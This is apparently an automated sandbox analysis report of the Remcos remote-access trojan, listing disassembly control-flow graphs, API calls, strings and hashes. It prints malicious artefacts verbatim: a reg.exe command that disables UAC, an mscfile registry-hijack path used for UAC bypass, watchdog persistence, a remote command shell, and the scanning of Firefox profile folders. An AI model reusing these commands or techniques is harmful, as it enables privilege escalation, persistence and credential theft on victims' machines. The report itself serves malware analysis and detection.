                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: LongNamePath
                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                • API String ID: 82841172-425784914
                                • Opcode ID: efc3c0baafdbfff7e48422d81b3d3964992ef81177afee3682326039726f1f54
                                • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                                • Opcode Fuzzy Hash: efc3c0baafdbfff7e48422d81b3d3964992ef81177afee3682326039726f1f54
                                • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                  • Part of subcall function 00419F23: IsWow64Process.KERNEL32(00000000,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F3B
                                  • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                  • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                  • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 782494840-2070987746
                                • Opcode ID: 156a184d01e916dba470f1893c8ece1237ddc25b581fb251fffab04ca2ede48f
                                • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                • Opcode Fuzzy Hash: 156a184d01e916dba470f1893c8ece1237ddc25b581fb251fffab04ca2ede48f
                                • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 686 40e501-40e562 call 434c30 * 2 CreateProcessA CloseHandle * 2
                                APIs
                                • CreateProcessA.KERNELBASE(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?,00000000,00471FFC), ref: 0040E547
                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E556
                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,00471FFC), ref: 0040E55B
                                Strings
                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040E53D
                                • C:\Windows\System32\cmd.exe, xrefs: 0040E542
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateProcess
                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                • API String ID: 2922976086-4183131282
                                • Opcode ID: 0b970088cbc172ce3b0f8ed072908de03e6d7713b03aec3cda7e5915f8f0f445
                                • Instruction ID: 9c8cd13d2f2f5b55d8ef3643fb71004f418ed3317f879fdff7c1c4061e2abca7
                                • Opcode Fuzzy Hash: 0b970088cbc172ce3b0f8ed072908de03e6d7713b03aec3cda7e5915f8f0f445
                                • Instruction Fuzzy Hash: 1AF06276D0029C7ACB20AAD7AC0DEDF7F3CEBC6B11F00005AB504A2050D5746540CAB5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 691 41a17b-41a18c 692 41a1a4-41a1ab 691->692 693 41a18e-41a191 691->693 696 41a1ac-41a1c5 CreateFileW 692->696 694 41a193-41a198 693->694 695 41a19a-41a1a2 693->695 694->696 695->696 697 41a1c7-41a1c9 696->697 698 41a1cb-41a1d0 696->698 701 41a209-41a20e 697->701 699 41a1d2-41a1e0 SetFilePointer 698->699 700 41a1eb-41a1fc WriteFile 698->700 699->700 702 41a1e2-41a1e9 CloseHandle 699->702 703 41a200-41a207 CloseHandle 700->703 704 41a1fe 700->704 702->697 703->701 704->703
                                APIs
                                • CreateFileW.KERNELBASE(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
                                • WriteFile.KERNELBASE(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreatePointerWrite
                                • String ID:
                                • API String ID: 1852769593-0
                                • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                                • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 705 4120e8-41210c RegOpenKeyExA 706 412158 705->706 707 41210e-412130 RegQueryValueExA RegCloseKey 705->707 708 41215a-41215e 706->708 707->706 709 412132-412156 call 4061cd call 406252 707->709 709->708
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                • RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: origmsc
                                • API String ID: 3677997916-68016026
                                • Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                • Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
                                • Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
                                • Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 714 412204-412217 RegCreateKeyW 715 412257 714->715 716 412219-412255 call 40245c call 401ee4 RegSetValueExW RegCloseKey 714->716 718 412259-412267 call 401ee9 715->718 716->718
                                APIs
                                • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,?), ref: 0041220F
                                • RegSetValueExW.KERNELBASE(?,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,C:\Users\user\Desktop\DB5rQYsfd6.exe), ref: 0041223E
                                • RegCloseKey.ADVAPI32(?,?,80000001,?,0040674F,00469654,C:\Users\user\Desktop\DB5rQYsfd6.exe), ref: 00412249
                                Strings
                                • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: Software\Classes\mscfile\shell\open\command
                                • API String ID: 1818849710-505396733
                                • Opcode ID: 648c2acabd6d386b3cfaeca52641303c516f0863a12d7755eae886d0bed66f7b
                                • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                                • Opcode Fuzzy Hash: 648c2acabd6d386b3cfaeca52641303c516f0863a12d7755eae886d0bed66f7b
                                • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 752 411f91-411fbd RegOpenKeyExA 753 411ff2 752->753 754 411fbf-411fe7 RegQueryValueExA RegCloseKey 752->754 755 411ff4 753->755 754->755 756 411fe9-411ff0 754->756 757 411ff9-412005 call 402073 755->757 756->757
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                • RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 7a1544548b3f7c2bdbc79f0242f37fe977c23e2c99779a8425445d9686f74cb1
                                • Instruction ID: 7c5a36a74d232ee299d7294234303f181ef10811f7d8c913f13e4634b011a18e
                                • Opcode Fuzzy Hash: 7a1544548b3f7c2bdbc79f0242f37fe977c23e2c99779a8425445d9686f74cb1
                                • Instruction Fuzzy Hash: 2D01D676900218BBCB209B95DD08DEF7F7DDB84751F000166BB05A3150DB748E46D7B8

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 760 411f34-411f5c RegOpenKeyExA 761 411f8b 760->761 762 411f5e-411f89 RegQueryValueExA RegCloseKey 760->762 763 411f8d-411f90 761->763 762->763
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                                • RegCloseKey.ADVAPI32(?), ref: 00411F7D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID:
                                • API String ID: 3677997916-0
                                • Opcode ID: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
                                • Instruction ID: 6ec0a72befc52f1c009cc632a5b728b25634ffaa8485c37bac66e7b8b5c78dc5
                                • Opcode Fuzzy Hash: 57758b6d0601c7ca4cdc37a1c8378ac71baf4d5830b0c502524eb489cf77768e
                                • Instruction Fuzzy Hash: 31F01D7694020CBFDF109FA09C45FEE7BBCEB04B11F1041A5BA04E6191D2359A54DB94

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 786 40163e-401644 787 401646-401648 786->787 788 401649-401654 786->788 789 401656 788->789 790 40165b-401665 788->790 789->790 791 401667-40166d 790->791 792 401688-401689 call 43229f 790->792 791->792 793 40166f-401674 791->793 796 40168e-40168f 792->796 793->789 795 401676-401686 call 43229f 793->795 798 401691-401693 795->798 796->798
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 800 443649-443655 801 443687-443692 call 43ad91 800->801 802 443657-443659 800->802 809 443694-443696 801->809 804 443672-443683 RtlAllocateHeap 802->804 805 44365b-44365c 802->805 806 443685 804->806 807 44365e-443665 call 442a57 804->807 805->804 806->809 807->801 812 443667-443670 call 440480 807->812 812->801 812->804
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                • Instruction ID: 99ef05a6bb91785527f59a1062444bc3c705daae6acf277761014d7f2c467fed
                                • Opcode Fuzzy Hash: 0c61ffa0ec78c269e0422769366e0108c3b164e239eff4ad14a217a7d57edf52
                                • Instruction Fuzzy Hash: 7EE0E52110162377F6312E635C0075B36489F41BA2F17412BFC8596780CB69CE0041AD
                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                  • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                  • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                  • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                • String ID: (#G$Remcos restarted by watchdog!$T/F$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$h5S$rmclient.exe$svchost.exe
                                • API String ID: 3018269243-3917573979
                                • Opcode ID: b3dfcf4463fbf2cca260735c8ecdde3b8902cd66c8ba09f9d97a59f394eae5ef
                                • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                • Opcode Fuzzy Hash: b3dfcf4463fbf2cca260735c8ecdde3b8902cd66c8ba09f9d97a59f394eae5ef
                                • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                                APIs
                                • SetEvent.KERNEL32(?,?), ref: 00406D4A
                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                                • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                                  • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                                  • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                                  • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                                  • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                                  • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                                • DeleteFileA.KERNEL32(?), ref: 0040768E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$DeleteDirectoryRemove$AttributesCloseDriveEventExecuteFirstLocalLogicalNextShellStringsTime
                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $T/F$Unable to delete: $Unable to rename file!$open
                                • API String ID: 3077191444-2050282093
                                • Opcode ID: be72c0cea12ebda5ccd09e67db53343e383971f16eef94204e7e81f1bd3ddd56
                                • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                                • Opcode Fuzzy Hash: be72c0cea12ebda5ccd09e67db53343e383971f16eef94204e7e81f1bd3ddd56
                                • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004056C6
                                • __Init_thread_footer.LIBCMT ref: 00405703
                                • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                  • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                • CloseHandle.KERNEL32 ref: 00405A03
                                • CloseHandle.KERNEL32 ref: 00405A0B
                                • CloseHandle.KERNEL32 ref: 00405A1D
                                • CloseHandle.KERNEL32 ref: 00405A25
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexit
                                • String ID: SystemDrive$cmd.exe
                                • API String ID: 618029711-3633465311
                                • Opcode ID: db8eee06f3bbda7447ed97e7c303faadcd31ae3810963c73e2bf5aa46986682c
                                • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                • Opcode Fuzzy Hash: db8eee06f3bbda7447ed97e7c303faadcd31ae3810963c73e2bf5aa46986682c
                                • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                                APIs
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                • FindClose.KERNEL32(00000000), ref: 0040AC53
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1668735454.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1668704043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668866571.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1668929492.0000000000475000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_DB5rQYsfd6.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$FirstNext
